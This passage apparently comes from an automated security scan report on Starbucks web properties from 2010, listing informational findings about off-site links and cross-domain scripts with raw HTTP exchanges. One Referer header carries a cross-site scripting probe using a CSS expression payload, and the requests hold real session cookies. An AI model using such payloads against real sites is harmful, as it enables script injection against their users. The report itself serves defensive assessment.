       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.8. http://www.starbucksstore.com/coffee-machines/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:05 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.9. http://www.starbucksstore.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /default.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:50 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb758;cat=starb781;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.10. http://www.starbucksstore.com/guestassist/shcontus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20694
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:46 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.11. http://www.starbucksstore.com/products/shprodde.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /products/shprodde.asp?SKU=317917 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35039
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:53 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

10.12. http://www.starbucksstore.com/products/shprodli.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27551
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:28 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

10. Cross-domain script include
There are 91 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


10.1. http://www.starbucks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=e3f5py45fbmdq045dakdnm45; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:12:26 GMT
Content-Length: 41010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.2. http://www.starbucks.com/about-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:21 GMT
Connection: close
Content-Length: 38166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.3. http://www.starbucks.com/blog/610/check-in-at-starbucks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/610/check-in-at-starbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/610/check-in-at-starbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:08 GMT
Connection: close
Content-Length: 65059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.4. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/611/my-starbucks-idea-s-100-000th-idea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/611/my-starbucks-idea-s-100-000th-idea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:43 GMT
Connection: close
Content-Length: 48282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.5. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/612/good-books-on-the-starbucks-digital-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/612/good-books-on-the-starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:16:03 GMT
Connection: close
Content-Length: 41705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.6. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/615/i-m-dreaming-of-cranberry-bliss-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/615/i-m-dreaming-of-cranberry-bliss-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.7. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /blog/616/thanksgiving-blend-fit-for-a-feast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /blog/616/thanksgiving-blend-fit-for-a-feast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:10 GMT
Connection: close
Content-Length: 39234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.8. http://www.starbucks.com/coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:21 GMT
Content-Length: 56441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.9. http://www.starbucks.com/coffee/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:54 GMT
Connection: close
Content-Length: 37484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.10. http://www.starbucks.com/coffee/learn/clover

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/learn/clover HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:18 GMT
Connection: close
Content-Length: 38914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
